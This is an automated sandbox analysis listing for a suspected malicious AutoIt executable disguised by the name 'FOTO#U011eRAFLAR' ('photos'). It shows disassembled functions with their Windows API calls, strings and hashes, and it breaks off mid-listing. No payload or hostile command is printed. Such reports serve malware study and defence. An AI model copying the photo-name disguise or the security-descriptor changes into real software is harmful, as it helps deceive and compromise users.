                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 94fc4b6b86293c4619d9609578a9e035a20d5487f6a9d5d1e5266168f1dae800
                                                                      • Instruction ID: 02c772d33ef6ad0b9dfbb49e851aaa64f8829d47ef95c626b078c90a43c70b18
                                                                      • Opcode Fuzzy Hash: 94fc4b6b86293c4619d9609578a9e035a20d5487f6a9d5d1e5266168f1dae800
                                                                      • Instruction Fuzzy Hash: AC61F23074520AAFC714FF28DA41DAD77B6EF44304B288026E446AB395DBB1ED85CBB1
                                                                      APIs
                                                                      • GetSysColor.USER32(00000012), ref: 00DA72F0
                                                                      • SetTextColor.GDI32(?,?), ref: 00DA72F4
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00DA730A
                                                                      • GetSysColor.USER32(0000000F), ref: 00DA7315
                                                                      • CreateSolidBrush.GDI32(?), ref: 00DA731A
                                                                      • GetSysColor.USER32(00000011), ref: 00DA7332
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DA7340
                                                                      • SelectObject.GDI32(?,00000000), ref: 00DA7351
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00DA735A
                                                                      • SelectObject.GDI32(?,?), ref: 00DA7367
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00DA7386
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DA739D
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DA73AA
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DA73F9
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DA7423
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00DA7441
                                                                      • DrawFocusRect.USER32(?,?), ref: 00DA744C
                                                                      • GetSysColor.USER32(00000011), ref: 00DA745D
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00DA7465
                                                                      • DrawTextW.USER32(?,00DA6FC4,000000FF,?,00000000), ref: 00DA7477
                                                                      • SelectObject.GDI32(?,?), ref: 00DA748E
                                                                      • DeleteObject.GDI32(?), ref: 00DA7499
                                                                      • SelectObject.GDI32(?,?), ref: 00DA749F
                                                                      • DeleteObject.GDI32(?), ref: 00DA74A4
                                                                      • SetTextColor.GDI32(?,?), ref: 00DA74AA
                                                                      • SetBkColor.GDI32(?,?), ref: 00DA74B4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 080996bf383590a146d3de309a2dc2c5c6d5bf0336e63381ce17a38ae6374ed1
                                                                      • Instruction ID: b141ae785102e3d144e4fd27dddf06da4b99523d8af28b80393a63af6c24604b
                                                                      • Opcode Fuzzy Hash: 080996bf383590a146d3de309a2dc2c5c6d5bf0336e63381ce17a38ae6374ed1
                                                                      • Instruction Fuzzy Hash: E0617A72D00218AFDF109FA4DC48EEEBBB9EF0A320F155125F911EB2A1D7749940DBA0
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00DA105B
                                                                      • GetDesktopWindow.USER32 ref: 00DA1070
                                                                      • GetWindowRect.USER32(00000000), ref: 00DA1077
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA10CC
                                                                      • DestroyWindow.USER32(?), ref: 00DA10EC
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DA1120
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DA113E
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DA1150
                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00DA1165
                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00DA1178
                                                                      • IsWindowVisible.USER32(00000000), ref: 00DA11D4
                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00DA11EF
                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00DA1203
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00DA121B
                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00DA1241
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00DA125B
                                                                      • CopyRect.USER32(?,?), ref: 00DA1272
                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00DA12DD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: ($0$tooltips_class32
                                                                      • API String ID: 698492251-4156429822
                                                                      • Opcode ID: 8b9806c9166ad326cd54cf580743e9cdc45edc002c5dfc7de2da2a33a8a70293
                                                                      • Instruction ID: d0fded5c815f9ed4a9ce496f8d8d886405833ef1dcb29e747708655a89daab8b
                                                                      • Opcode Fuzzy Hash: 8b9806c9166ad326cd54cf580743e9cdc45edc002c5dfc7de2da2a33a8a70293
                                                                      • Instruction Fuzzy Hash: 23B1BC71618351AFD710DF64C885BABBBE4FF85310F048918F5899B2A1DB31E844CBB6
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D2E8FC
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00D2E904
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D2E92F
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00D2E937
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00D2E95C
                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D2E979
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D2E989
                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D2E9BC
                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D2E9D0
                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00D2E9EE
                                                                      • GetStockObject.GDI32(00000011), ref: 00D2EA0A
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D2EA15
                                                                        • Part of subcall function 00D2EA9A: GetCursorPos.USER32(?), ref: 00D2EAAE
                                                                        • Part of subcall function 00D2EA9A: ScreenToClient.USER32(?,?), ref: 00D2EACB
                                                                        • Part of subcall function 00D2EA9A: GetAsyncKeyState.USER32(00000001), ref: 00D2EB02
                                                                        • Part of subcall function 00D2EA9A: GetAsyncKeyState.USER32(00000002), ref: 00D2EB1C
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00D2A671), ref: 00D2EA3C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: d24ce67dd47d849f43d8bdb29bd99f02f040fc363decfafe442a43792ad3e905
                                                                      • Instruction ID: e7e302be338d1b353bb25516f8182a728df3bc3846d0c3cc0bf200e298c42c9f
                                                                      • Opcode Fuzzy Hash: d24ce67dd47d849f43d8bdb29bd99f02f040fc363decfafe442a43792ad3e905
                                                                      • Instruction Fuzzy Hash: 51B14979A00219AFDB14DFA8DC85BAE7BB5FB48314F144229FA15EB290D774E840CF61
                                                                      APIs
                                                                        • Part of subcall function 00D7103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D71058
                                                                        • Part of subcall function 00D7103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D70ADF,?,?,?), ref: 00D71064
                                                                        • Part of subcall function 00D7103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D70ADF,?,?,?), ref: 00D71073
                                                                        • Part of subcall function 00D7103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D70ADF,?,?,?), ref: 00D7107A
                                                                        • Part of subcall function 00D7103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D71091
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D70D39
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D70D6D
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00D70D84
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00D70DBE
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D70DDA
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00D70DF1
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D70DF9
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00D70E00
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D70E21
                                                                      • CopySid.ADVAPI32(00000000), ref: 00D70E28
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D70E57
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D70E79
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D70E8B
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D70EB2
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D70EB9
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D70EC2
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D70EC9
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D70ED2
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D70ED9
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D70EE5
                                                                      • HeapFree.KERNEL32(00000000), ref: 00D70EEC
                                                                        • Part of subcall function 00D710D7: GetProcessHeap.KERNEL32(00000008,00D70AF5,?,00000000,?,00D70AF5,?), ref: 00D710E5
                                                                        • Part of subcall function 00D710D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D70AF5,?), ref: 00D710EC
                                                                        • Part of subcall function 00D710D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D70AF5,?), ref: 00D710FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: 8db62938ca770c1b0219325e18eedb0a519c553391b0c08c83115a0a8104f546
                                                                      • Instruction ID: 314d9352b9ede5a1662cab8467d56cef73188e1007779bec8e31ffe41c7b1937
                                                                      • Opcode Fuzzy Hash: 8db62938ca770c1b0219325e18eedb0a519c553391b0c08c83115a0a8104f546
                                                                      • Instruction Fuzzy Hash: F5715A72A10309EBDF20DFA4DC44BAEBBB8EF05314F188515F919E6291E7719A45CB70
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00DA08F9
                                                                      • _wcslen.LIBCMT ref: 00DA0934
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DA0987
                                                                      • _wcslen.LIBCMT ref: 00DA09BD
                                                                      • _wcslen.LIBCMT ref: 00DA0A39
                                                                      • _wcslen.LIBCMT ref: 00DA0AB4
                                                                        • Part of subcall function 00D13536: _wcslen.LIBCMT ref: 00D13541
                                                                        • Part of subcall function 00D72B2C: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D72B3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 1103490817-4258414348
                                                                      • Opcode ID: 5f451ff0fef4b9d0dd5878ebf00567f6477789a4cfa13fb81b8a850194d066b9
                                                                      • Instruction ID: 46744c08a7fc4c56b1246b8e119f82a88ae2baa1909867fa45960addab428f17
                                                                      • Opcode Fuzzy Hash: 5f451ff0fef4b9d0dd5878ebf00567f6477789a4cfa13fb81b8a850194d066b9
                                                                      • Instruction Fuzzy Hash: E9E19F316083419FC714DF24C49086ABBE2FF99314B58895DF89A9B362DB31ED85CBB1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 1256254125-909552448
                                                                      • Opcode ID: 25af3e0ed5e6e7b3f4085f022bc04976bc73712932439fad86c20218223738f1
                                                                      • Instruction ID: 0f3d202b32b2c73a6aee568799ea1e916bed566ca968445645bd872001807c5c
                                                                      • Opcode Fuzzy Hash: 25af3e0ed5e6e7b3f4085f022bc04976bc73712932439fad86c20218223738f1
                                                                      • Instruction Fuzzy Hash: 1F710633A2416AABCF20DF7CDD515FA3391AF61764F191529E8A19B384EA34DD80C7B0
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00DA824C
                                                                      • _wcslen.LIBCMT ref: 00DA8260
                                                                      • _wcslen.LIBCMT ref: 00DA8283
                                                                      • _wcslen.LIBCMT ref: 00DA82A6
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DA82E4
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00DA354D,?), ref: 00DA8340
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DA8379
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DA83BC
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DA83F3
                                                                      • FreeLibrary.KERNEL32(?), ref: 00DA83FF
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DA840F
                                                                      • DestroyIcon.USER32(?), ref: 00DA841E
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DA843B
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DA8447
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 799131459-1154884017
                                                                      • Opcode ID: 0a0ac41792e3b7dda065dcc29c67a7b509ead22c5a74528fc1c344cf1604b3e6
                                                                      • Instruction ID: 14b17da2464288aee2c281e7aeca006771a574df51980ef5a429dfa720e3e37e
                                                                      • Opcode Fuzzy Hash: 0a0ac41792e3b7dda065dcc29c67a7b509ead22c5a74528fc1c344cf1604b3e6
                                                                      • Instruction Fuzzy Hash: C861AC71A00715BEEB14DF64DC85BBA7BA8FB0AB20F104509FD15D61D1EBB4A980DBB0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 0-1645009161
                                                                      • Opcode ID: 73ff3c337223fc5c4e4f2ebf87905e1c7218c3d57e3e0dfe02f5459096df26de
                                                                      • Instruction ID: a3af227ac4b846da43c12e5c47d37d9279b07d628c5c9eaafce80ac4e0841db5
                                                                      • Opcode Fuzzy Hash: 73ff3c337223fc5c4e4f2ebf87905e1c7218c3d57e3e0dfe02f5459096df26de
                                                                      • Instruction Fuzzy Hash: 6881C071A00316BECB11AB60FC66FEA77A4EF15340F184025FD05AA195EF70D985D7B1
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?), ref: 00D83E16
                                                                      • _wcslen.LIBCMT ref: 00D83E21
                                                                      • _wcslen.LIBCMT ref: 00D83E78
                                                                      • _wcslen.LIBCMT ref: 00D83EB6
                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00D83EF4
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D83F3C
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D83F77
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D83FA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 1839972693-4113822522
                                                                      • Opcode ID: b79ed3f50f0c07fe9b49b36cdeb9b6aa0760346c6db1925c863c9713970b1b46
                                                                      • Instruction ID: 836a5eff17f15e26f9ac4bc707303bbd09b2514e1c59dfb13b81957f55f725ce
                                                                      • Opcode Fuzzy Hash: b79ed3f50f0c07fe9b49b36cdeb9b6aa0760346c6db1925c863c9713970b1b46
                                                                      • Instruction Fuzzy Hash: 4771B032504312AFC710EF28D88186AB7E4EF94B64F54492DF89997251EB31DE85CBB1
                                                                      APIs
                                                                      • LoadIconW.USER32(00000063), ref: 00D75984
                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D75996
                                                                      • SetWindowTextW.USER32(?,?), ref: 00D759AD
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00D759C2
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00D759C8
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00D759D8
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00D759DE
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D759FF
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D75A19
                                                                      • GetWindowRect.USER32(?,?), ref: 00D75A22
                                                                      • _wcslen.LIBCMT ref: 00D75A89
                                                                      • SetWindowTextW.USER32(?,?), ref: 00D75AC5
                                                                      • GetDesktopWindow.USER32 ref: 00D75ACB
                                                                      • GetWindowRect.USER32(00000000), ref: 00D75AD2
                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00D75B29
                                                                      • GetClientRect.USER32(?,?), ref: 00D75B36
                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00D75B5B
                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D75B85
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                      • String ID:
                                                                      • API String ID: 895679908-0
                                                                      • Opcode ID: e97033fa6a3fe1fa49545818fca67bd57069b374a11ee9304380a0b660e84a7c
                                                                      • Instruction ID: 71d5fd410e1a7a7250a41ac9bbb2b6f62b5a77ae91b48dd28712e87be173495a
                                                                      • Opcode Fuzzy Hash: e97033fa6a3fe1fa49545818fca67bd57069b374a11ee9304380a0b660e84a7c
                                                                      • Instruction Fuzzy Hash: 38717E31900B059FDB20DFA8DD85BAEBBF5FF48714F144528E186E26A4E7B5E904CB60
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00D8FD4E
                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00D8FD59
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00D8FD64
                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00D8FD6F
                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00D8FD7A
                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00D8FD85
                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00D8FD90
                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00D8FD9B
                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00D8FDA6
